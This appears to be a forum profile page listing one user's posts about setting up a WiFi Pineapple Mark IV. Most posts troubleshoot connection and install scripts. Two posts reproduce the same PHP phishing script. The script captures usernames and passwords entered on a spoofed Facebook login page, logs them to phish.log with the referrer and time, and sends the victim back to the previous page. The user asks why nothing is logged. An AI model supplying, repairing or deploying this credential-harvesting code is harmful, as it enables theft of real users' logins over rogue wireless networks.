Jump to content

AlienG

Active Members
  • Posts

    9
  • Joined

  • Last visited

Profile Information

  • Gender
    Male
  • Location
    Germany

Recent Profile Visitors

485 profile views

AlienG's Achievements

Newbie

Newbie (1/14)

  1. AlienG

    Win SCP

    digip, Thanks a lot and not sure why I named SCP might be the frustration of been working with this for hours butr anyways. Not sure what am I doing wrong here but I tried your script and is showin an error on line 27 and 28. Also to make sure I am doing everything else correct. The victim/test computer has to connect to the "pineapple SSID" right? When I log in to "facebook.com" shows on the URL www.facebook.com/facebook.html, which it is correct, I think... then the page after trying to log in return to the same page like an error. after that I check on the phish.log folder and appears empty.
  2. AlienG

    Win SCP

    Can someone help me put? My problem is that on the below script after testing Facebook page nothing was saved on phish.log. Or should I use the one Darren has posted? Thanks <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("pineapple/phish.log", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?> <html><body> <script type=text/javascript"> function goBack() { window.history.back() } </script> </head> <body onload="goBack()"> </body></html>
  3. Can someone help me put? My problem is that on the below script after testing Facebook page nothing is saved on pineapple.log. Or should I use the one Darren has posted? Thanks <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("pineapple/phish.log", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?> <html><body> <script type=text/javascript"> function goBack() { window.history.back() } </script> </head> <body onload="goBack()"> </body></html>
  4. How long usually takes for the firmware upgrade? my its been doing it for about 10 minutes now...
  5. DID {Go into your network manager, "Edit Connections", click on "Wired Connection", Un-check the box that says "Automatically Connect", Save Settings, Re-run wp4.sh} Pineapple Netmask [255.255.255.0]: Pineapple Network [172.16.42.0/24]: Interface between PC and Pineapple [eth0]: Interface between PC and Internet [wlan0]: Internet Gateway [192.168.2.1]: XXX.XXX.X.X IP Address of Host PC [172.16.42.42]: IP Address of Pineapple [172.16.42.1]: _ . ___ \||/ Internet: 192.168.2.1 - wlan0 ( _ )_ <--> [___] <--> ,<><>, Computer: 172.16.42.42 (_ _(_ ,) \___\ '<><>' Pineapple: 172.16.42.0/24 - eth0 Browse to http://172.16.42.1/pineapple -- Happy Hacking! But it won't connect from browser not sure why....
  6. Seb, I did exactly as the video but the issue is that after sudo ./wp4.sh won't ping the mk4. Also when I open the browser and type 172.16.42.1:1471 or 172.16.42.1/pineapple it won't connect.
  7. Is it normal that from the Terminal after typing http://wifipineapple.com/wp4.sh show failed: No route to host?????
  8. That's what I'm trying to do, but for some reason it won't connect to my PC anymore. Right now I'm installing VMware fusion on my Mac to use the pineapple there...
  9. Pineapple Hardware Version Mark IV Pineapple Software Version 2.1 OS used to connect to the pineapple: Ubuntu Network layout of how your setup is connected (including IP information): Ethernet cable from AP to Pineapple LAN port, Ethernet cable from PoE to PC. Ping results from computer to pineapple: None Is the problem repeatable (Yes/No): Yes Steps taken which created the problem: Initial installation Error Messages: "connecting to wifipineapple.com | 69.163.250.20 | :80... stay just like that Log file information:
×
×
  • Create New...